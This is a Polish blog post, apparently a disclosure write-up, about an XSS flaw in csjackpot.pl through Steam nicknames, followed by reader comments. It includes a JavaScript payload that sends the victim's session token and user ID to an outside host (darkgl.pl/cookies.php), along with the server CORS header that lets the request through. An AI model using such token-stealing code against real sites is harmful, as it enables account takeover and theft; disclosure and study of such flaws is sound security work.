Błąd XSS w CSJackpot.pl

XSS jest techniką wykradania wrażliwych informacji poprzez umieszczenie złośliwego kodu w kodzie strony. Próbowałem skontaktować się z administracją csjackpot.pl jednak nie uzyskałem żadnej odpowiedzi. W przypadku csjackpot.pl tego typu informacje to cookies
  • jackpot-token
  • jackpot-cookies
  • jackpot-login
  • jackpot-nick
  • jackpot-trade-url
Najważniejsza informacją dla atakującego jest oczywiście jackpot-token dzięki któremu jeśli znamy token innego użytkownika możemy zalogować się na jego konto w kilka sekund. Strona oferuje nam logowanie poprzez steam , po zalogowaniu w górnym menu widzimy swój nick: CSJackpot.pl     0.1€ Ciekawe co się stanie jeśli do nick wrzucimy
. Efekt: Bez tytułu Spróbujemy teraz zaincludować nasz kod JS’a. W nicku steam możemy umieścić tylko 32 znaki , mało , szczególnie że musimy zawrzeć w nim odrazu ciąg zamykający skrypt javascript , ponieważ przeglądarka zrobi to za mnie a ja oszczędzam ilość znaków , cóż trzeba korzystać że mamy już troche inteligentniejsze przeglądarki na naszych komputerach ;). Kilka prób i mam dwa sposoby: 1.
 w drugim sposobie dodatkowo pomijam '"' w atrybucie src ponownie przeglądarka sama wykryje link i przeparsuje go a ja oszczędzam całe dwa znaki 😉 !

Przygotujmy najpierw plik JS który chcemy wstrzyknąć
 
var currentToken = getToken(),
userLogin = getUserID();

$.get( "http://darkgl.pl/cookies.php?cookie=" + currentToken + "&login=" + userLogin );
Jest to bardzo prosty skrypt pobiera token oraz userid i wysyła je poprzez get do skryptu php. Skrypt jest dostępny pod linkiem
http://darkgl.pl/script.js
Skrypt php jest bardzo prosty
 

Aby całość zadziałała musimy dodać do nagłówków serwera na którym jest plik php.
 
add_header Access-Control-Allow-Origin *;
Dzięki temu skrypt js może wysyłać zapytania do innego serwera dostępnego z innej domeny niż jest wykonywany skrypt. Niestety limit 32 znaków nadal nas obowiązuje drugi sposób tzn.

			

9 komentarzy o “Błąd XSS w CSJackpot.pl

    1. Czytaj dokładnie artykuł ,

      Zmartwię teraz tych którzy chcieli robić złe rzeczy chat i inne miejsca w których jest wyświetlany nick są stripowane prawdopodobnie przy pomoc strip_tags php.

      Jeśli uważasz że opublikował bym publicznie coś co mogło by spowodować straty finansowe u zwykłych użytkowników to niestety mylisz się 😉 , tak więc jest to ciekawostka , artykuł dla ciekawskich którzy chcą się czegoś nauczyć 😉

  1. Co mógłbym poradzić gdy po wygraniu zdarzył mi sie błąd mianowicie odrazu po zalogowaniu wylogowuje mnie ??
    Prosze o szybką odpowiedz

          1. Pisałem do jechać parę E-mail na fb o nigdzie nie odpisuje to szukam jakiegoś sposobu na odzyskanie moich skinow

Dodaj komentarz

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.